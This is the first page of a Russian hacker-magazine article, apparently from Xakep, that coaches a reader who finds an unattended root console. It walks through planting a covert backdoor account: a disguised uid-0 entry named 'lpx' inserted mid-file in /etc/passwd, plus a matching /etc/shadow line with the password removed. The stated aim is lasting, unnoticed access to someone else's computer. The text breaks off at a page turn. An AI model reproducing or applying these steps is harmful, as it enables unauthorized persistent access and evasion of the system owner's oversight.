ИЗИ ШЕЛЛ ДВУМЯ ПАЛЬЦАМИ

1oker

Спецвыпуск Xakep, номер #025, стр. 025-050-1


У тебя сегодня праздник. Твой папашка, или кто-то там еще, свалил в ванную (выносить мусор, поесть на кухню, нужное подчеркнуть) и оставил тебе подарок... залогиненную консоль. Да не просто залогиненную, а под пользователем root. Сразу начинают разбегаться во все стороны глаза, а в башке крутиться всякие мысли - как бы тебе это использовать на всю катушку. Все кричат, типа, Linux защищенная и все такое. Ни фига никто не защищен, если по дурости оставляет рабочее место, пред этим не заблокировав его. По-настоящему защищенная система, когда она выключена и спрятана в сейфе. И то могут спереть вместе с сейфом :-).

ЧТО С ЭТИМ ДЕЛАТЬ?

Тык-с, оглянись по сторонам и займись делом. Сначала проверим, а точно ли ты под пользователем root. Делается это командой id.

[root@home:opt]# id

uid=0(root) gid=0(root)

Вот теперь ты точно уверен, что работаешь под root. Потому что имя пользователя и вид приглашения могут быть любыми.

ОК. Давай-ка немного поработаем и немного пошалим. Наделать гадостей ты успеешь всегда, а вот сделать все тихо и незаметно - это просто высший пилотаж. Самый кайф - наделать гадостей так, чтобы ни одна собака не догадалась о том, что в ее системе были гости.

ГОТОВИМ ПЛАЦДАРМ

Твоя задача состоит не просто в разовом получении доступа и сотворении какой-нибудь пакости, но и в том, чтобы иметь доступ к компьютеру постоянно в любое время. Для этого надо создать для себя регистрационную запись.

Немного теории. В современных unix-системах регистрационная запись о пользователе состоит из двух частей. Первая, в файле /etc/passwd, содержит имя пользователя, признак парольного входа, идентификатор пользователя uid, идентификатор группы gid, полное имя пользователя, домашний каталог и командную оболочку. Все это перечислено по порядку. Запись выглядит так:

root:x:0:0:System Administrator:/root:/bin/bash

Для администратора системы идентификатор пользователя равен 0, идентификатор группы также равен 0.

Вторая часть регистрационной записи находится в /etc/shadow и выглядит так:

root:$1a$08$E1U6cАdMNcCruz9ffTJ1mOe23cHpHneRIQrsXZcyEzMgS/QoeqJye:11937::::::

Возможная ценная информация из всего этого мусора выглядит как набор символов и цифирей. Это зашифрованный пароль. Чтобы его расшифровать, надо иметь кучу времени и супер-пупер компьютер. Ничего этого у тебя нет, поэтому о взломе пароля трепаться не буду. Придется подойти с другого края.

Регистрационная запись создается командой adduser или useradd в зависимости от версии системы. Но ты не ищешь легких путей, и надо действовать хитрее.

В текстовом редакторе открываешь /etc/passwd. Копируешь строчку, в которой есть слово root, и вместо имени пользователя ставишь что-нибудь свое, что-то похожее на системное, например, lpx. Слова System Administrator тоже можно стереть. Вот что должно получиться после копирования:

root:x:0:0:System Administrator:/root:/bin/bash

...

lpx:x:0:0::/root:/bin/bash

Я специально в примере указал имя lpx, похожее на lpt, чтобы было менее подозрительно. И лучше вставить куда-нибудь в серединку, а не добавлять в конец. Теперь открываешь файл /etc/shadow и под строкой с надписью root делаешь ее копию, НО стираешь зашифрованный пароль. В результате должно быть:

Содержание  Вперед на стр. 025-050-2